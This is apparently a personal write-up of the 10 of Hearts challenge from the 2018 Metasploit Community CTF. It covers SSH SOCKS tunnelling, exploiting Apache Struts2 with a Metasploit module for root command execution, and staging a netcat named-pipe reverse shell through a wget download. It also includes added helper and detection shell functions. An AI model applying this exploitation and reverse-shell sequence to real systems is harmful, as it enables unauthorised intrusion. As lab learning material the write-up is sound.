This year I participated in the Rapid7 Metasploit Community CTF. I wouldn’t say it was beginner level, but it was fun nonetheless. For the CTF there were 15 PNG images for the flags. Each flag was worth 100 points. At the start of the event, each team was given a Kali jump box to attack from and two vulnerable machines (one Linux – one Windows) to exploit. You’d think that once a host is compromised, all the flags would be available to find. That wasn’t the case. Each exploitable service was running in its own container. If that service was compromised, then only the flag associated with it would be available. Anyway, I ended up with only one flag and three shells. It seems kind of lame, but I learned stuff in the process so that makes it all worth it.
Setting up:
One of the most important takeaways from the event was learning how to set up a port forward for my browser. Previously, I had only used a VNC server to get GUI control and from there use a browser. I did that during the first day of the CTF and it was awful! The next day I looked for a better solution. Someone in the chat posted something about a -D command in SSH. I’m so glad they did! With the -D option SSH will allow dynamic port forwarding and it’s awesome!
Run the ssh command as normal and simply append the -D and a port number of your choosing at the end. This will open a listening port on your local host 127.0.0.1.
Now configure a web browser proxy using the port.
Make sure to:
- Select the same port you put in the SSH command
- Use 127.0.0.1 as the host to connect to
- Select SOCKS 5 specifically – using “for all connections” didn’t work for me
- Remove any disable or ignore settings for 127.0.0.1
Also make sure that your proxy is enabled. I like using FoxyProxy but it works the same with the default browser options.
The proxy can also work with BurpSuite. Just put the proxy setting for SSH in the user tab of Burp and point your browser proxy to Burp. It works amazingly well.
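The tunnel setup described above, written out as an added example (not from the original write-up): it opens the SOCKS listener on loopback only, checks where the listener is actually bound, and fetches a page through it with DNS resolved on the far side. `JUMP_HOST`, `SOCKS_PORT` and `TARGET` are placeholders, and the function names are made up for this sketch.

```sh
# Placeholders, not values from the CTF.
JUMP_HOST="kali@jumpbox.example"
SOCKS_PORT=1080

# Open the SOCKS listener. -D takes [bind_address:]port; naming 127.0.0.1
# keeps the proxy off other interfaces. -N: no remote command, -f: background.
start_tunnel() {
  ssh -f -N -D "127.0.0.1:${SOCKS_PORT}" "$JUMP_HOST"
}

# Classify the listener for port $1 from `ss -ltn` output on stdin.
# Prints: loopback-only, exposed, or not-listening.
socks_listener_status() {
  awk -v port="$1" '
    $1 == "LISTEN" {
      n = split($4, parts, ":")            # port is the last ":" field
      if (parts[n] != port) next
      addr = substr($4, 1, length($4) - length(parts[n]) - 1)
      if (addr == "127.0.0.1" || addr == "[::1]") loopback++
      else exposed++                       # 0.0.0.0, *, [::] or a LAN address
    }
    END {
      if (exposed) print "exposed"
      else if (loopback) print "loopback-only"
      else print "not-listening"
    }'
}

# Fetch a URL through the tunnel. --socks5-hostname hands the hostname to the
# proxy, so name resolution happens on the jump box side rather than locally.
fetch_via_tunnel() {
  curl --silent --show-error --max-time 10 \
       --socks5-hostname "127.0.0.1:${SOCKS_PORT}" "$1"
}

# Typical use:
#   start_tunnel
#   ss -ltn | socks_listener_status "$SOCKS_PORT"
#   fetch_via_tunnel "http://TARGET:8080/"
```

An `exposed` result means other hosts on your network can use the proxy to reach whatever the jump box can reach, so close the tunnel and rebind it to 127.0.0.1.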
Ok now that our browser is set up, we need to find something to exploit. Running Nmap shows a lot of open services to poke at. For this walkthrough, I’m focusing on port 8080 running Apache Struts2.
Let’s browse there with our cool new setup and see what it looks like.
Yep it’s for sure running Apache Struts. Let’s see if Metasploit has any exploits for that. Doing a simple search for “struts” brings up a small list of options. I picked the most recent exploit listed.
Since I had no idea if this exploit would apply or how it worked, I brought up the description by using the info command.
Well I don’t have the exact version of Struts, but this exploit covers a wide range. It could still work. So I set the rhost and looked through the options.
So this is the second time the redirect action was mentioned. Also, showcase.action was the default action brought up when we browsed to the page. This could work. The rport was already set, but the target information was set to auto. That doesn’t always work so I looked at the options.
Then I manually set it to Linux. Once the target was set the default payload is set as well. Notice it’s not a reverse shell, but a command execution. I would have to supply the command.
The first time I actually chose a ping command (ping -c 4 myIP) so that it would ping back on my own system. I did that because I didn’t think I’d be able to see the output of my command and by using ping, I could see if my command worked by capturing the pingbacks with tcpdump. It did, but this particular payload will also display the output of the command. So for this walkthrough I’m just going to use whoami.
Now let’s execute it. Nope … Failed ☹
Notice how it mentions the Action? We know the target’s right, but we might need a different action.
Going back to the browser and selecting the config tab enables the user to browse for various actions. That’s pretty helpful!
Working my way down through the different actions I finally came to the help action.
When I clicked the link, I noticed that I was redirected to date.action. Hmmmm … this might work.
So I set the action to help.action and tried again.
Success and ROOT!
So now that I have root command execution, I should be able to get a shell. There is one small issue. The semicolon (;) character is not allowed through this exploit. That takes away a lot of options for getting a reverse shell through this command … at least directly. The box does have netcat, but it’s missing the -e option to make things easy on us. Luckily there’s another way to abuse the presence of netcat. Using a first in, first out, named pipe it is possible to get the connection we need.
Since this command does contain semicolon characters, I put it into a file and downloaded it. I used nano to create the file and put in the code.
Now I set up a Python HTTP server.
Then I set my Metasploit command to run wget to download the file. Once the command was given, I could see the success broadcast to me in Metasploit.
I could also see it on the HTTP server.
In order to run the script, the permissions settings need to be set to execute. I just set it to 777 to make things easy on me, but in real life that’s probably a bad idea.
There’s never any output from that command if it works so I assumed it did. Now I need to set up a listener. This also could have been done in Metasploit, but this way was just faster.
Now I set the command in Metasploit to run the script. When I run it, it hangs. That’s actually a good sign.
Going back to my netcat listener, I can see that I have a shell!
I have a root shell!!
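How this staging sequence looks from the defender's side, as an added example that is not part of the original write-up: the function reads process-execution records and reports any file that the application server's process downloaded with wget, made executable, and then ran. The record format (epoch, parent process name, command line), the parent name `java` and the sample records are all constructed for illustration.

```sh
# Constructed process-execution records (not captured from the CTF):
# <epoch> <parent process> <command line...>
sample_exec_log() {
cat <<'EOF'
1543700001 java whoami
1543700050 java wget http://203.0.113.9:8000/stage.sh
1543700055 java chmod 777 stage.sh
1543700060 java sh stage.sh
1543700090 sshd wget http://203.0.113.9:8000/notes.txt
1543700095 cron chmod 644 /var/log/app.log
EOF
}

# Print each file that children of parent process $1 fetched with wget,
# then marked executable, then ran. Reads exec records on stdin.
staged_files() {
  awk -v parent="$1" '
    function base(p,   n, a) { n = split(p, a, "/"); return a[n] }
    # Symbolic +x, or an octal mode with any execute bit set (odd digit).
    function is_exec_mode(m) {
      return index(m, "+x") > 0 || m ~ /^[0-7]*[1357][0-7]*$/
    }
    $2 != parent { next }                      # only the watched service
    $3 == "wget"  { fetched[base($NF)] = 1; next }
    $3 == "chmod" {
      f = base($NF)
      if (is_exec_mode($4) && fetched[f]) armed[f] = 1
      next
    }
    {                                          # any later command naming the file
      for (i = 3; i <= NF; i++) {
        f = base($i)
        if (armed[f] && !seen[f]++) print f
      }
    }'
}

# Typical use: sample_exec_log | staged_files java
```

A web application container rarely has a reason to download and execute files at all, so the same result can be had preventively by running the service as a non-root user on a read-only filesystem.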
Now I need to find the flag. Since I didn’t know what flag it was, I just started searching for files with the various card names. I was very happy when I got a hit on hearts. It also wasn’t very far away.
Since this box had md5sum installed, I was able to get the flag hash and upload it for some points, but I also wanted to see it.
While browsing around the website earlier, I found a docs directory. By putting the flag into the docs web directory I could now view and save it.
There is the 10 of hearts in all its glory.
So that was the 10 of Hearts challenge from the 2018 Metasploit CTF. While I didn’t get anywhere near the number of flags I wanted to, it was still fun and I learned some really cool things. I can’t wait to read some of the other write-ups to see how close I was on some of the other flags.
-R3a50n